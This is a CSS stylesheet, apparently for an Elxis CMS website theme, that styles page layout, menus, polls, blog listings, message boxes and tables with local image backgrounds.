- width : 220px;
- }
- #useravatar {
- text-align : center;
- width : 110px;
- display : block;
- position : relative;
- float : left;
- }
- #useravatar img {
- margin : 2px;
- padding : 2px;
- border : #cccccc solid 1px;
- }
- #useravatar #useravatarname {
- background-color : #aaaaaa;
- color : #ffffff;
- font-size : 11px;
- margin : 2px;
- text-align : center;
- display : block;
- }
- #useravatar #useravatarname img {
- padding : 1px;
- border : 0;
- }
- .profile_signature {
- background-color : #eeeeee;
- padding : 2px;
- color : #333333;
- font-style : italic;
- border : #999999 dashed 1px;
- }
- a.mainlevel {
- display : block;
- }
- ul.contenttoc {
- border : #666666 solid 1px;
- }
- ul.contenttoc li {
- background : inherit;
- list-style-type : none;
- text-align : left;
- padding-left : 5px;
- padding-right : 5px;
- margin : 0;
- }
- ul.contenttoc li.headtoc {
- list-style-type : none;
- background-color : #666666;
- color : #ffffff;
- font-weight : bold;
- }
- h1.contentheading, h1.componentheading {
- font-size : 1.3em;
- font-weight : bold;
- margin : 0 0 0.7em 0;
- border : 0;
- }
- h2.contentheading {
- font-size : 1em;
- font-weight : bold;
- margin : 0.4em 0 0.4em 0;
- border : 0;
- }
- .contentpaneopen, .contentpane {
- padding : 0;
- margin : 0;
- width : 100%;
- }
- .contentdescription {
- background : none;
- margin-top : 0;
- border : none;
- padding : 0;
- }
- .contentpaneopen_text {
- padding : 1em 0 1em 0;
- margin : 0;
- }
- .item_createdate, .item_modifydate {
- font-style : italic;
- }
- .sectiontablefooter {
- text-align : center;
- margin : 5px;
- padding : 5px;
- }
- div.table, div.blog, div.blogleading, div.blog_more {
- margin : 4px 0 4px 0;
- padding : 0;
- width : auto;
- }
- div.tablerow, div.blogrow {
- margin : 0;
- padding : 0;
- width : 100%;
- float : left;
- }
- div.tablecell, div.blogcell {
- margin : 0;
- padding : 0;
- width : 49%;
- float : left;
- }
- .moreLinks {
- padding : 10px 0 5px 0;
- font-weight : bold;
- font-size : 1.2em;
- }
- .mp3audio {
- padding : 5px;
- }
- .highlight {
- background-color : #fbfa84;
- color : #000;
- padding : 0 2px;
- font-weight : bold;
- }
- span.polltitle {
- font-weight : bold;
- }
- ul.polltable {
- list-style : none;
- padding : 1px 0;
- background : inherit;
- text-indent : 0;
- }
- ul.polltable li {
- padding : 2px;
- margin : 2px;
- text-indent : 0;
- }
- ul.polltable li.row0 {
- background-color : #eeeeee;
- }
- ul.polltable li.row1 {
- background-color : #f9f9f0;
- }
- .modfpg-container {
- float : left;
- padding : 0;
- margin : 0;
- margin-bottom : 5px;
- width : 100%;
- }
- .modfpg-row {
- padding : 0;
- margin : 0;
- margin-bottom : 5px;
- float : left;
- width : 100%;
- }
- .modfpg-box {
- float : left;
- padding : 2px;
- margin : 2px;
- text-align : justify;
- }
- .modfpg-ctitle {
- font-weight : bold;
- font-size : 100%;
- border-bottom : 1px solid #ccc;
- display : block;
- padding-bottom : 5px;
- margin-bottom : 5px;
- background : url(../images/M_images/green_arrow.gif) top left no-repeat;
- padding-left : 20px;
- }
- .modfpg-introtitle a, .modfpg-introtitle a:visited, .modfpg-introtitle a:active {
- font-weight : bold;
- color : #333;
- }
- .modfpg-introtitle a:hover {
- text-decoration : underline;
- }
- .modfpg-authordate {
- color : #666;
- font-size : 0.8em;
- font-weight : normal;
- height : 0.85em;
- }
- .modfpg-img {
- float : left;
- margin : 0.3em;
- }
- .modfpg-ul {
- list-style : none;
- }
- .modfpg-ul li {
- font-size : 0.90em;
- }
- .modfpg-ul li a, .modfpg-box li a:hover, .modfpg-box li a:visited {
- text-decoration : none;
- }
- .polls_color_1 {
- background-color : #8d1b1b;
- border : #b22222 ridge 2px;
- }
- .polls_color_2 {
- background-color : #6740e1;
- border : #4169e1 ridge 2px;
- }
- .polls_color_3 {
- background-color : #8d8d8d;
- border : #d2d2d2 ridge 2px;
- }
- .polls_color_4 {
- background-color : #cc8500;
- border : #ffa500 ridge 2px;
- }
- .polls_color_5 {
- background-color : #5b781e;
- border : #6b8e23 ridge 2px;
- }
- .pollstableborder {
- border : solid 1px;
- padding : 2px;
- }
- div.commentsrow {
- min-height : 70px;
- border-bottom : 1px dotted #ccc;
- margin : 10px 0;
- padding : 5px 0;
- }
- .elxisfieldset {
- margin : 20px 0;
- font-size : 0.92em;
- line-height : 1.1em;
- }
- .elxisfieldset legend {
- font-weight : bold;
- padding : 0 5px;
- }
- .elxislabel {
- width : 30%;
- float : left;
- }
- .elxisfieldset input.inputbox, .elxisfieldset textarea.text_area {
- padding : 1px;
- }
- @import url('layout.css');
- body {
- background : #ffffff;
- }
- #container {
- padding : 10px 0;
- margin : 0;
- width : 100%;
- background : url(../images/mainbg.jpg) 0% 0% repeat-x #f6f6f6;
- text-align : center;
- }
- #mainwrap {
- margin : 0 auto;
- width : 970px;
- text-align : left;
- height : 100% !important ;
- height : 1%;
- background : url(../images/wrapbg.jpg) 0% 0% repeat-y;
- }
- #main-body {
- width : 970px;
- float : left;
- height : 100% !important ;
- height : 1%;
- }
- #sitecontent {
- float : left;
- width : 670px;
- overflow : hidden;
- }
- #rightcolumn {
- float : right;
- width : 285px;
- overflow : hidden;
- margin : 0 10px 5px 5px;
- }
- .inside {
- padding : 10px 10px 10px 20px;
- }
- .inside-col {
- margin : 0 4px 0 8px;
- }
- #content_advert1 {
- position : relative;
- float : left;
- width : 670px;
- }
- #content_top_wrapper {
- position : relative;
- float : left;
- clear : none;
- width : 100%;
- margin : 0;
- padding : 0;
- }
- #content_user1 {
- position : relative;
- float : left;
- width : 320px;
- margin : 5px 2px 5px 20px;
- }
- #content_user2 {
- position : relative;
- float : right;
- width : 320px;
- margin : 5px 5px 5px 2px;
- }
- #position_top {
- position : relative;
- float : left;
- clear : none;
- width : 100%;
- margin : 0;
- padding : 0;
- }
- #header {
- position : relative;
- float : left;
- width : 636px;
- margin : 5px 5px 5px 20px;
- padding-top : 10px;
- display : block;
- }
- #headertop {
- width : 970px;
- height : 6px;
- background : url(../images/topbg.jpg) 0% 0% no-repeat;
- }
- #mfaheader {
- position : relative;
- width : 970px;
- height : 115px;
- background : url(../images/mfaheaderbg.jpg) 0% 0% repeat-y;
- }
- #date_container {
- position : relative;
- float : left;
- width : 30%;
- height : 115px;
- }
- #dateinline {
- position : relative;
- float : left;
- width : 100%;
- margin : 0;
- padding-top : 10px;
- padding-left : 20px;
- font-family : tahoma, arial, sans-serif;
- font-size : 12px;
- color : #6a6b6e;
- }
- #sitelogo {
- position : relative;
- float : left;
- padding : 7px 0;
- height : 100px;
- width : 40%;
- }
- #language_container {
- position : relative;
- float : right;
- width : 30%;
- }
- #language {
- position : relative;
- float : right;
- width : 31px;
- padding : 5px 20px;
- }
- #pathway_container {
- width : 95%;
- margin : 1px 0 0 20px;
- padding-left : 5px;
- background-color : #f4f5f6;
- border : #cddbe9 dotted 1px;
- }
- #container_user3 {
- position : relative;
- float : left;
- width : 970px;
- margin : 0 auto;
- background : url(../images/mfaheaderbg.jpg) 0% 0% repeat-y;
- }
- #content_user3 {
- position : relative;
- float : left;
- width : 930px;
- padding : 0 20px;
- }
- #toolbar_container {
- position : relative;
- width : 930px;
- height : 28px;
- margin : 0 20px;
- z-index : 1000;
- background : url(../images/bluemenu.jpg) 0% 0% repeat-x transparent;
- border-top : 1px solid #05a9f5;
- }
- #toolbar {
- position : relative;
- float : left;
- height : 28px;
- width : 930px;
- z-index : 1000;
- }
- #content_advert3 {
- position : relative;
- float : left;
- margin : 0 auto;
- width : 928px;
- margin : 0 20px 5px 20px;
- border-left : 1px solid #4e85d6;
- border-right : 1px solid #4e85d6;
- border-bottom : 1px solid #4e85d6;
- background-color : #ffffff;
- z-index : 100;
- }
- #fader {
- position : relative;
- float : left;
- margin : 0 auto;
- width : 970px;
- z-index : 100;
- }
- #mfabanners {
- position : relative;
- float : left;
- width : 636px;
- margin : 5px 5px 5px 20px;
- display : block;
- }
- #footercontainer {
- width : 970px;
- margin : 0 auto;
- background : url(../images/mfaheaderbg.jpg) 0% 0% repeat-y;
- }
- #footer_sitemap {
- position : relative;
- width : 950px;
- margin : 0 10px;
- padding-top : 30px;
- background : url(../images/footermap_bg.jpg) 0% 0% repeat-x;
- }
- #bottom_menu {
- width : 970px;
- margin : 0 auto;
- display : block;
- background : url(../images/bottom_menubg.jpg) 0% 0% repeat-y;
- }
- #copyright_container {
- position : relative;
- width : 970px;
- margin : 0 auto;
- background : url(../images/mfaheaderbg.jpg) 0% 0% repeat-y;
- }
- #content_user7 {
- width : 800px;
- margin : 0 auto;
- text-align : center;
- padding-top : 3px;
- }
- #copyright {
- width : 970px;
- padding : 3px 0;
- color : #a09e9e;
- font-size : 0.9em;
- text-align : center;
- }
- #copyright a {
- color : #0d88c1;
- font-weight : bold;
- text-decoration : none;
- }
- #copyright a:hover {
- color : #ff9900;
- }
- #copyright_bottom {
- position : relative;
- width : 970px;
- height : 6px;
- background : url(../images/bottombg.jpg) 0% 0% repeat-y;
- }
- .ypex_footerinner {
- padding : 0;
- margin : 0 auto;
- width : 970px;
- position : relative;
- }
- @import url('customize.css');
- a, a:visited, a:link, a:active {
- color : #246fb4;
- text-decoration : none;
- }
- a:hover {
- color : #ff9900;
- text-decoration : none;
- }
- a {
- outline : none;
- }
- .inputbox, .text_area, .selectbox {
- background-color : #ffffff;
- border : #78a1bb solid 1px;
- padding : 2px 0 2px 0;
- margin : 1px;
- color : #000;
- }
- .button {
- background-color : #e0e7fc;
- border : #2465a2 solid 1px;
- color : #394a53;
- font-family : tahoma, verdana, sans-serif;
- font-weight : bold;
- padding : 2px;
- margin : 2px;
- cursor : pointer;
- }
- blockquote {
- font-family : "Gill Sans", "Trebuchet MS", Calibri, sans-serif;
- background : url(../images/quote-left.gif) top left no-repeat transparent;
- color : #555;
- font-size : 13px;
- font-style : italic;
- line-height : 16px;
- margin : 15px 0;
- padding : 0 0 5px 39px;
- width : auto;
- }
- blockquote p {
- font-family : "Gill Sans", "Trebuchet MS", Calibri, sans-serif;
- font-size : 13px;
- background : url(../images/quote-right.gif) bottom right no-repeat transparent;
- margin-top : 0;
- padding : 0 39px 10px 0;
- }
- div.bubble {
- margin : 15px 0 -24px 0;
- clear : both;
- }
- div.bubble p {
- background : url(../images/volume.png) 7px 4px no-repeat #f9f9f9;
- font-size : 1em;
- margin : 0;
- padding : 6px 6px 6px 24px;
- border : #ddd solid 1px;
- color : #555;
- }
- div.bubble span {
- display : block;
- height : 46px !important ;
- margin : 0;
- padding : 31px 0 0 22px;
- font-family : tahoma, verdana, arial, serif;
- font-size : 12px;
- font-weight : bold;
- color : #666;
- line-height : 15px;
- background : url(../images/bubbles_bg.png) top left no-repeat transparent;
- overflow : hidden;
- }
- p.small_error {
- font-size : 1em;
- line-height : 16px;
- margin : 1em 0;
- background : url(../images/exclamation-red.png) top left no-repeat transparent;
- padding : 0 0 0 18px;
- color : #ff370c;
- }
- p.small_warn {
- font-size : 1em;
- line-height : 16px;
- margin : 1em 0;
- background : url(../images/exclamation.png) top left no-repeat transparent;
- padding : 0 0 0 18px;
- color : #ff9900;
- }
- p.big_warn {
- font-size : 1em;
- margin : 1em 0;
- padding : 10px 4px 10px 38px;
- background : url(../images/warning32.png) 50% 2px no-repeat #fcf9c6;
- border-top : 1px solid #feb526;
- border-bottom : 1px solid #feb526;
- color : #ff9900;
- font-weight : bold;
- }
- p.small_info {
- font-size : 1em;
- line-height : 16px;
- margin : 1em 0;
- background : url(../images/information.png) top left no-repeat transparent;
- padding : 0 0 0 18px;
- color : #0d398b;
- }
- p.big_info {
- font-size : 1em;
- margin : 1em 0;
- padding : 10px 4px 10px 38px;
- background : url(../images/info32.png) 50% 2px no-repeat #e4f5ff;
- border-top : 1px solid #a2d1ef;
- border-bottom : 1px solid #a2d1ef;
- color : #222;
- }
- p.small_help {
- font-size : 1em;
- line-height : 16px;
- margin : 1em 0;
- background : url(../images/help.png) top left no-repeat transparent;
- padding : 0 0 0 18px;
- }
- p.big_help {
- font-size : 1em;
- margin : 1em 0;
- padding : 10px 4px 10px 38px;
- background : url(../images/help32.png) 50% 2px no-repeat #f8f8f8;
- border-top : 1px solid #ddd;
- border-bottom : 1px solid #ddd;
- color : #222;
- }
- p.small_tick {
- font-size : 1em;
- line-height : 16px;
- margin : 1em 0;
- background : url(../images/tick.png) top left no-repeat transparent;
- padding : 0 0 0 18px;
- }
- p.small_pin {
- font-size : 1em;
- line-height : 16px;
- margin : 1em 0;
- background : url(../images/pin.png) top left no-repeat transparent;
- padding : 0 0 0 18px;
- color : #666;
- }
- p.small_bulb {
- font-size : 1em;
- line-height : 16px;
- margin : 1em 0;
- background : url(../images/bulb.png) top left no-repeat transparent;
- padding : 0 0 0 18px;
- }
- p.big_user {
- font-size : 1em;
- margin : 1em 0;
- padding : 10px 4px 10px 38px;
- background : url(../images/userinfo.png) 50% 2px no-repeat #e4f5ff;
- border-top : 1px solid #a2d1ef;
- border-bottom : 1px solid #a2d1ef;
- color : #222;
- }
- .small {
- font-family : tahoma, verdana, arial;
- font-size : 0.9em;
- color : #444;
- }
- .small-label {
- font-size : 0.8em;
- line-height : 1.2em;
- }
- div.back_button {
- background : url(../images/back.png) 50% 0% no-repeat transparent;
- padding-left : 18px;
- margin : 10px;
- }
- div.back_button a:link, div.back_button a:visited {
- color : #246fb4;
- text-decoration : none;
- }
- div.back_button a:hover {
- color : #ff9900;
- text-decoration : none;
- }
- div.message {
- clear : both;
- background : url(../images/info32.png) 50% 0% no-repeat #c3e5fc;
- border : #6899b8 dashed 1px;
- padding : 8px 5px 8px 38px;
- margin : 5px;
- font-weight : bold;
- }
- span.pathway {
- font-size : 0.8em;
- margin : 0;
- margin-left : 5px;
- padding-left : 20px;
- line-height : 22px;
- color : #808080;
- }
- span.pathway a {
- background : url(../images/path-arrows.gif) 50% 100% no-repeat;
- padding-right : 16px;
- font-weight : bold;
- color : #808080;
- text-decoration : none;
- }
- span.pathway img {
- display : none;
- }
- a.pathway, a.pathway:visited {
- color : #808080;
- text-decoration : none;
- }
- a.pathway:hover {
- text-decoration : underline;
- }
- h1.contentheading, h1.componentheading {
- font-size : 1.1em;
- font-weight : bold;
- color : #224f65;
- padding : 0.3em 0 0.1em 0;
- }
- h2.contentheading {
- font-size : 1em;
- font-weight : bold;
- color : #333;
- padding : 1em 0 0.1em 0;
- }
- h3.contentheading {
- font-size : 1em;
- font-weight : bold;
- color : #333;
- padding : 1em 0 0.1em 0;
- }
- div.buttonheading {
- margin-top : -0.5em;
- margin-right : 10px;
- }
- div.item_sectioncategory a {
- text-decoration : none;
- }
- div.item_sectioncategory, div.item_author, div.item_hits, div.item_comments {
- background : url(../images/pencil.gif) 50% 0% no-repeat transparent;
- padding-left : 18px;
- font-family : tahoma, verdana, arial, sans-serif;
- color : #444;
- font-style : normal;
- font-size : 0.92em;
- }
- div.item_createdate, div.item_modifydate {
- font-family : tahoma, verdana, arial, sans-serif;
- color : #444;
- font-style : normal;
- font-size : 0.92em;
- }
- div.item_createdate, div.item_modifydate {
- background-color : transparent;
- }
- div.item_modifydate {
- margin : 10px 0 20px 0;
- }
- div.item_sectioncategory {
- background : url(../images/category.png) 50% 0% no-repeat transparent;
- font-size : 1em;
- }
- div.item_hits {
- background : url(../images/bars.png) 50% 0% no-repeat transparent;
- }
- div.item_comments {
- background : url(../images/comments.gif) 50% 0% no-repeat transparent;
- }
- div.item_related {
- margin : 20px 0 20px 0;
- color : #444;
- }
- div.item_related a {
- line-height : 18px;
- padding-left : 18px;
- background : url(../images/url.png) 50% 0% no-repeat transparent;
- font-family : tahoma, verdana, arial, sans-serif;
- font-size : 0.92em;
- text-decoration : none;
- }
- div.contentpane {
- color : #000;
- text-align : justify;
- }
- .contentdescription {
- float : left;
- margin-bottom : 10px;
- }
- .contentdescription img {
- margin : 18px 5px 2px 5px;
- }
- div.tcs {
- margin-bottom : 10px;
- }
- div.tcs ul {
- margin : 0;
- padding : 10px 0;
- }
- div.tcs ul.table {
- margin : 0;
- padding : 0;
- }
- div.tcs li {
- background-color : #f4f5f7;
- padding : 3px;
- border : #c5d5e3 dotted 1px;
- }
- ul.table li.row0, ul.table li.sectiontableentry1 {
- background-color : #f4f5f7;
- }
- ul.table li.row1, ul.table li.sectiontableentry2 {
- background-color : #e9f0f8;
- }
- ul.table li.sectiontableentry1 a:link, ul.table li.sectiontableentry1 a:visited, ul.table li.sectiontableentry2 a:link, ul.table li.sectiontableentry2 a:visited {
- color : #246fb4;
- font-weight : bold;
- text-decoration : none;
- }
- ul.table li.sectiontableentry1 a:hover, ul.table li.sectiontableentry2 a:hover {
- color : #ff9900;
- }
- div.sectiontablefooter {
- border : #cccccc dashed 1px;
- margin : 15px 0 20px 0;
- }
- div.blog {
- overflow : hidden;
- }
- div.blogleading {
- overflow : hidden;
- clear : both;
- background-color : #f8f8f8;
- border : #ddd solid 1px;
- padding : 4px;
- }
- div.blogcell div.contentpaneopen_text {
- text-align : justify;
- padding : 0.3em;
- }
- .moreLinks {
- color : #444;
- }
- div.blog_more ul {
- margin : 5px;
- }
- div.blog_more li {
- list-style-type : square;
- }
- div.blog_more li a.blogsection {
- color : #275870;
- font-size : 8pt;
- text-decoration : none;
- }
- div.blog_more li a.blogsection:hover {
- color : #ff9900;
- }
- div.contentpaneopen_text {
- text-align : justify;
- padding : 0.5em;
- }
- div.contentpaneopen_text li {
- list-style-type : disc;
- }
- a.contentpagetitle:link, a.contentpagetitle:visited {
- font-size : 1.2em;
- color : #246fb4;
- text-decoration : none;
- }
- a.contentpagetitle:hover {
- color : #ff9900;
- text-decoration : none;
- }
- a.category:link, a.category:visited {
- font-weight : bold;
- color : #246fb4;
- text-decoration : none;
- }
- a.category:hover {
- color : #ff9900;
- }
- a.readon:link, a.readon:visited {
- background-color : #e0e7fc;
- border : #2465a2 solid 1px;
- color : #394a53;
- padding : 3px;
- text-decoration : none;
- margin : 10px 0 20px 0;
- display : block;
- float : left;
- }
- a.readon:hover {
- background-color : #2465a2;
- color : #ffffff;
- }
- div.blogleading a.readon {
- background-color : #e0e7fc;
- border : #2465a2 solid 1px;
- color : #394a53;
- padding : 3px;
- text-decoration : none;
- margin : 10px 0 20px 0;
- }
- div.blogleading a.readon:hover {
- background-color : #2465a2;
- color : #ffffff;
- }
- span.pagenav {
- font-size : 0.8em;
- }
- a.pagenav:link, a.pagenav:visited, .pagenav_next a:link, .pagenav_next a:visited, .pagenav_prev a:link, .pagenav_prev a:visited {
- font-size : 0.8em;
- background-color : #e0e7fc;
- color : #394a53;
- padding : 3px;
- text-decoration : none;
- border : #2465a2 solid 1px;
- }
- a.pagenav:hover, .pagenav_next a:hover, .pagenav_prev a:hover {
- background-color : #2465a2;
- color : #ffffff;
- }
- div.weblinks ul.table {
- float : left;
- width : 98%;
- border : 0;
- padding : 0;
- margin : 0;
- margin-bottom : 10px;
- }
- div.weblinks ul.table li {
- padding : 2px;
- margin : 2px;
- text-indent : 0;
- }
- div.weblinks a.category:link, div.weblinks a.category:visited {
- color : #246fb4;
- text-decoration : underline;
- }
- div.weblinks a.category:hover {
- color : #ff9900;
- }
- #weblinksform {
- background-color : #eeeeee;
- border : #ccc dashed 1px;
- margin : 4px;
- padding : 4px;
- }
- div.newsfeeds ul li, div.newsfeeds ul.table li {
- color : #555;
- padding : 2px 0;
- }
- table.contentpaneopen {
- padding : 0;
- margin : 5px 0 20px 0;
- font-size : 0.9em;
- }
- table.contentpaneopen th {
- padding : 2px;
- margin : 0;
- border-collapse : collapse;
- border : none 0;
- font-weight : bold;
- color : #fff;
- background-color : #2f627c;
- }
- table.contentpaneopen #activecolumn {
- background-color : #9c0909;
- }
- table.contentpaneopen th a {
- text-decoration : none;
- color : #fff;
- }
- table.contentpaneopen th a:hover {
- color : #e6e6d0;
- }
- tr.sectiontableentry1 {
- background-color : #f2f3f4;
- }
- tr.sectiontableentry2 {
- background-color : #e7e7d5;
- }
- tr.sectiontableentry1:hover {
- background-color : #e1e1cb;
- }
- tr.sectiontableentry2:hover {
- background-color : #e1e1cb;
- }
- table.contentpaneopen td {
- padding : 4px 0 4px 0;
- }
- #vuserprofile h1 {
- font-size : 1.3em;
- color : #1a4f6a;
- font-weight : bold;
- }
- #vuserprofile h2 {
- font-size : 1.2em;
- color : #1a4f6a;
- font-weight : bold;
- }
- div.contactscats ul li a {
- text-decoration : none;
- font-weight : bold;
- }
- div.contactscats ul.table li a {
- text-decoration : underline;
- font-weight : normal;
- }
- ul.polltable li.row0, ul.polltable li.sectiontableentry1 {
- background-color : #f8f8f8;
- }
- ul.polltable li.row1, ul.polltable li.sectiontableentry2 {
- background-color : #f8f8f8;
- }
- ul.polltable li.sectiontableentry1 a:link, ul.polltable li.sectiontableentry1 a:visited, ul.polltable li.sectiontableentry2 a:link, ul.polltable li.sectiontableentry2 a:visited {
- color : #5f5f30;
- font-weight : bold;
- text-decoration : none;
- }
- ul.polltable li.sectiontableentry1 a:hover, ul.polltable li.sectiontableentry2 a:hover {
- color : #ff9900;
- }
- .modfpg-ctitle {
- background : url(../images/build.png) top left no-repeat;
- }
- .modfpg-introtitle a, .modfpg-introtitle a:visited, .modfpg-introtitle a:active {
- color : #246fb4;
- text-decoration : none;
- }
- .modfpg-introtitle a:hover {
- color : #ff9900;
- text-decoration : none;
- }
- .search {
- background : url(../images/searchbox.png) top left no-repeat;
- padding : 2px 5px 1px 22px;
- margin : 5px 10px 10px 7px;
- width : 260px;
- height : 25px;
- }
- .search input, .search input.inputbox {
- border : 0;
- background-color : transparent;
- color : #246fb4;
- padding : 1px;
- width : 180px;
- margin : 0;
- }
- span.highlight {
- color : #000;
- font-weight : bold;
- }
- .moduletable-lang {
- text-align : center;
- color : #ffffff;
- font-weight : bold;
- }
- .moduletable-lang a {
- color : #eee;
- }
- .selectbox-lang {
- background-color : #1c6db8;
- color : #fff;
- padding : 2px;
- border : #295673 solid 1px;
- }
- #rightcolumn div.moduletable {
- margin : 5px 0;
- padding : 0;
- }
- #rightcolumn div.moduletable h3 {
- background : url(../images/modh3.png) 50% 4px no-repeat #164d83;
- font-size : 0.95em;
- font-weight : bold;
- color : #ffffff;
- border : #0b457b solid 1px;
- margin : 0 3px 0 0;
- padding : 4px 0 4px 24px;
- }
- #rightcolumn div.moduletable p {
- margin : 0;
- }
- .moduletable-flashmap {
- border : #4e85d6 solid 1px;
- }
- .moduletable-banner {
- text-align : center;
- padding : 10px 0 10px 0;
- }
- div.userlogin {
- min-height : 55px;
- }
- .userlogin img {
- margin : 0 2px 0 0;
- }
- div.userlogin a, div.userlogin a:visited {
- background : url(../images/info.png) 50% 0% no-repeat transparent;
- padding : 2px 0 1px 17px;
- font-size : 0.92em;
- color : #224b60;
- text-decoration : none;
- }
- div.userlogin a:hover {
- text-decoration : underline;
- }
- ul.mostread, ul.latestnews {
- margin-left : 0;
- margin-bottom : 10px;
- }
- ul.mostread li.latestnews, ul.latestnews li.latestnews {
- list-style-type : none;
- margin-left : 0.2em;
- padding-left : 18px;
- background : url(../images/bullet1.png) 50% 2px no-repeat transparent;
- }
- a.mostread, a.latestnews, a.mostread:visited, a.latestnews:visited {
- color : #4175df;
- text-decoration : none;
- }
- a.mostread:hover, a.latestnews:hover {
- color : #fdad45;
- text-decoration : underline;
- }
- div.syndicate {
- padding : 4px;
- }
- div.syndicate img {
- margin : 2px;
- }
- #topweblink {
- background-color : #e7f3fc;
- padding : 5px;
- padding-left : 20px;
- margin : 4px;
- margin-bottom : 20px;
- border : #20679d dashed 1px;
- }
- #topweblink h3 {
- color : #20679d;
- padding : 0;
- margin : 2px;
- font-weight : bold;
- }
- #topweblink img {
- margin : 4px;
- padding : 2px;
- border : #437493 solid 1px;
- }
- #topweblink-explain {
- color : #333;
- }
- #topweblink-desc {
- font-style : italic;
- }
- #topweblink-date {
- font-size : 0.9em;
- color : #555;
- }
- #topweblink a {
- text-decoration : underline;
- font-weight : bold;
- color : #0a5893;
- }
- .navigation {
- width : 800px;
- margin : 0 auto;
- height : 24px;
- }
- .navigation ul {
- overflow : hidden;
- margin : 0;
- padding : 0;
- text-align : center;
- }
- .navigation li {
- margin : 0 auto;
- padding : 0;
- display : inline-block;
- border : #2465a2 solid 1px;
- }
- .navigation li a, .navigation li a:visited {
- color : #394a53;
- display : block;
- font-family : tahoma, sans-serif;
- font-weight : normal;
- font-size : 0.9em;
- line-height : 18px;
- padding : 0 8px;
- text-decoration : none;
- background-color : #e0e7fc;
- }
- .navigation li a:hover {
- color : #f9f9f9;
- background-color : #2465a2;
- }
- .navigation li #active_menu-nav {
- color : #f9f9f9;
- background-color : #164d83;
- }
- a.mainlevel, a.mainlevel:visited {
- margin : 0;
- padding : 0;
- text-decoration : none;
- display : block;
- font-size : 1em;
- line-height : 1.5em;
- color : #000;
- margin-left : -5px;
- padding-left : 5px;
- }
- a.mainlevel:hover {
- background-color : #e9f1f9;
- text-decoration : none;
- }
- a.sublevel {
- line-height : 1.5em;
- padding : 2px;
- color : #000;
- text-decoration : none;
- }
- a.sublevel:hover {
- text-decoration : underline;
- }
- a#active_menu {
- color : #4a96dc;
- font-weight : bold;
- }
- #rightcolumn ul.mainlevel {
- padding : 0;
- margin : 0;
- }
- #rightcolumn ul.mainlevel li {
- list-style-type : none;
- margin : 0;
- padding : 0;
- background : none;
- border-bottom : 1px solid #f1eede;
- }
- #rightcolumn ul.mainlevel li a {
- background : url(../images/file.png) 50% 7px no-repeat #dae0e2;
- margin : 0 0 0 -5px;
- padding : 2px 0 2px 27px;
- font-size : 1em;
- color : #000;
- text-decoration : none;
- display : block;
- }
- #rightcolumn ul.mainlevel li a:hover {
- color : #4a96dc;
- background : url(../images/file.png) 50% 7px no-repeat #dadaea;
- }
- #rightcolumn ul.mainlevel a#active_menu {
- color : #4a96dc;
- font-weight : bold;
- }
- span.mosimage {
- text-align : center;
- }
- span.mosimage_caption {
- display : block;
- margin : 3px 0;
- font-size : 0.8em;
- color : #666;
- border : 0;
- }
- span.content_rating {
- background : url(../images/bars.png) 50% 0% no-repeat transparent;
- padding-left : 18px;
- font-family : tahoma, verdana, arial, sans-serif;
- color : #444;
- font-style : normal;
- font-size : 0.92em;
- }
- span.content_rating img {
- position : relative;
- vertical-align : bottom;
- }
- span.content_vote {
- font-weight : bold;
- font-family : tahoma, verdana, arial, sans-serif;
- color : #444;
- font-style : normal;
- font-size : 0.92em;
- background-color : #eeeeee;
- padding : 8px;
- border : #ccc solid 1px;
- }
- span.content_vote input.button {
- font-size : 0.95em;
- font-family : tahoma, verdana, sans-serif;
- }
- .pagenavcounter {
- font-size : 0.92em;
- color : #999;
- }
- div.pagenavbar {
- font-size : 0.92em;
- color : #999;
- border : #aaa dashed 1px;
- padding : 6px;
- width : auto;
- }
- div.pagenavbar a, div.pagenavbar a:link, div.pagenavbar a:visited, div.pagenavbar a:hover {
- color : #2e5f78;
- text-decoration : none;
- margin : 10px;
- }
- div.pagenavbar a:hover {
- color : #ff9900;
- }
- .roundtoc {
- font-size : 0.95em;
- padding : 4px 4px 4px 0;
- background-color : #f9f9f9;
- border : #164d83 solid 1px;
- text-align : left;
- line-height : 12px;
- margin-top : 5px;
- margin-left : 5px;
- }
- ul.contenttoc {
- background : #f9f9f9;
- border : 0;
- font-size : 0.95em;
- }
- ul.contenttoc li.headtoc {
- background : #1a558d;
- color : #89d8fd;
- font-size : 0.9em;
- padding : 4px;
- }
- ul.contenttoc a.toclink:link, ul.contenttoc a.toclink:visited {
- color : #246fb4;
- font-size : 0.95em;
- text-decoration : none;
- line-height : 12px;
- }
- ul.contenttoc a.toclink:hover {
- color : #ff9900;
- }
- #content_user1 h3 {
- background : url(../images/modh3.png) 50% 4px no-repeat #164d83;
- font-size : 0.95em;
- font-weight : bold;
- color : #ffffff;
- border : #0b457b solid 1px;
- margin : 0 0 5px 0;
- padding : 4px 0 4px 24px;
- }
- #content_user2 h3 {
- background : url(../images/modh3.png) 50% 4px no-repeat #164d83;
- font-size : 0.95em;
- font-weight : bold;
- color : #ffffff;
- border : #0b457b solid 1px;
- margin : 0 0 5px 0;
- padding : 4px 0 4px 24px;
- }
- #content_advert1 h3 {
- background : url(../images/modh3.png) 50% 4px no-repeat #f3f4f7;
- font-size : 0.92em;
- font-weight : bold;
- color : #c61212;
- border : #1c66a4 solid 1px;
- margin : 5px 440px 0 20px;
- padding : 4px 0 4px 24px;
- }
- a.button_round {
- display : block;
- width : 150px;
- height : 23px;
- text-align : center;
- margin : 6px auto;
- padding : 3px 0;
- color : #246fb4;
- text-decoration : none;
- font-size : 11px;
- background : url(../images/button_round.png) 0% 0% no-repeat transparent;
- }
- a.button_round:hover {
- color : #ff9900;
- }
- a.external, a.external:visited, a.external:hover {
- background : url(../images/external.png) center right no-repeat;
- padding-right : 13px;
- }
- .gototop {
- position : absolute;
- right : 20px;
- top : -21px;
- z-index : 2;
- }
- a.ypex_gototop, a.ypex_gototop:link, a.ypex_gototop:active, a.ypex_gototop:hover, a.ypex_gototop:visited {
- background : url(../images/arrow_up.png) -2px 2px no-repeat transparent;
- font-size : 11px;
- font-family : tahoma, verdana, sans-serif;
- padding : 0 0 0 20px;
- text-decoration : none;
- color : #234b7c;
- }
- a.ypex_gototop:hover {
- color : #ff9900;
- }
- .service_mfa, a.service_mfa, a.service_mfa:link, a.service_mfa:active, a.service_mfa:hover, a.service_mfa:visited {
- padding : 10px 0;
- text-align : center;
- font-size : 0.75em;
- font-weight : bold;
- line-height : 1.1em;
- color : #2191c5;
- }
- a.service_mfa:hover {
- color : #ff9900;
- }
- table.pinakas {
- margin : 10px 0;
- padding : 0;
- width : 100%;
- border : #b7d3eb solid 1px;
- border-collapse : collapse;
- font-size : 0.95em;
- text-align : center;
- }
- table.pinakas td {
- background-color : #f8f8f8;
- color : #333;
- padding : 0 2px;
- border : #b7d3eb solid 1px;
- }
